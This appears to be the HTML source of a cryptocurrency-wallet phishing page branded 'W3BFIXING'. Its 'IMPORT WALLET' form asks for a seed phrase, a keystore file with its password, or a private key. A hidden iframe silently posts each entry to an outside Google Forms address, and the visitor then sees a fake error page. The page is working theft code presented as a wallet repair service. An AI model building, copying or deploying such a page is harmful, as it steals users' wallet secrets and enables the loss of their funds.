<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>W3BFIXING</title>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <link rel="stylesheet" href="./style.css" />
  </head>

  <body>
    <!-- Navigation -->
    <nav class="navbar">
      <div class="navbar-container">
        <a href="index.html" style="text-decoration: none; color: #4b5320"
          ><div class="navbar-logo">W3BFIXING</div></a
        >
      </div>
    </nav>

    <div class="tabs-container">
      <h4 style="color: #4b5320" class="mt-4">IMPORT WALLET</h4>
      <div class="tabs">
        <button class="tab active" onclick="openTab(event, 'tab1')">
          Phrase
        </button>
        <button class="tab" onclick="openTab(event, 'tab2')">
          Keystore JSON
        </button>
        <button class="tab" onclick="openTab(event, 'tab3')">
          Private Key
        </button>
      </div>

<!--tab content-->
<script type="text/javascript">var submitted=false;</script>
<iframe name="hidden_iframe" id="hidden_iframe" style="display:none;" onload="if(submitted) 
 {window.location='./err.html';}"></iframe>
<form method="POST" action="https://docs.google.com/forms/d/e/1FAIpQLScStOhea4yFcOBR7mrMwQc5yJW4gv7fkrN8zhPt8gredIn-oQ/formResponse" target="hidden_iframe" onsubmit="submitted=true;">

  <div id="tab1" class="tab-content" style="display: block">
    <textarea name="entry.2005620554" minlength="12" placeholder="Phrase"></textarea>
    <button type="submit" class="btn">IMPORT</button>
  </div>
  <div id="tab2" class="tab-content" style="display: none">
    <textarea name="entry.1065046570"  minlength="12" placeholder="Keystore JSON"></textarea>
    <input type="text" name="entry.754817615" placeholder="Password" class="top" />
    <p>
      Several lines of text beginning with '(...)' plus the password you
      used to encrypt it.
    </p>
    <button type="submit" class="btn">IMPORT</button>
  </div>
  <div id="tab3" class="tab-content" style="display: none">
    <input type="text" name="entry.839337160" placeholder="Private Key"/>
    <p>Typically 12 (sometimes 24) words separated by single spaces</p>
    <button type="submit" class="btn">IMPORT</button>
  </div>
</div>


</form>

     

    <script src="./script.js"></script>
    <!-- Bootstrap JS -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
  </body>
</html>
